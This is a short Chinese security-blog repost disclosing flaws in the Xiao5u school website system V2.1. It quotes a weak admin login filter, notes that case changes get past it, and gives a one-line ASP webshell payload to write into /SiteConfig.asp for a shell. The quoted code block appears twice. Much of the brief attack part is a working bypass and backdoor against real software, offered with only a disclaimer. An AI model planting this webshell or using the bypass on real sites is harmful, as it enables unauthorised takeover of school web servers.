校无忧系统 漏洞

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日03:46:14评论852 views字数 451阅读1分30秒阅读模式
摘要

#####################################################################
by Roker
以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。
[php]
if request("action")="login" then
Username=trim(request("admin_name"))
Password=trim(request("admin_pass"))
end if
If Instr(Username,"or")<>0 or Instr(Password,"or")<>0 or Instr(Username,"and")<>0 or Instr(Password,"and")<>0Then
response.write "

没事别搞人家后台,谢谢!
否则一切后果自负!
校无忧-Www.Xiao5u.Com"
else
[/php]
这尼玛在逗我。。?

#####################################################################
by Roker
以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。
[php]
if request("action")="login" then
Username=trim(request("admin_name"))
Password=trim(request("admin_pass"))
end if
If Instr(Username,"or")<>0 or Instr(Password,"or")<>0 or Instr(Username,"and")<>0 or Instr(Password,"and")<>0Then
response.write "

没事别搞人家后台,谢谢!
否则一切后果自负!
校无忧-Www.Xiao5u.Com"
else
[/php]
这尼玛在逗我。。?

大小写绕过,

拿shell:
/SiteConfig.asp 处
"%><%eval(request("r"))%>
写入一句话。
他的 评选投票系统也是如此。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:46:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   校无忧系统 漏洞http://cn-sec.com/archives/75267.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息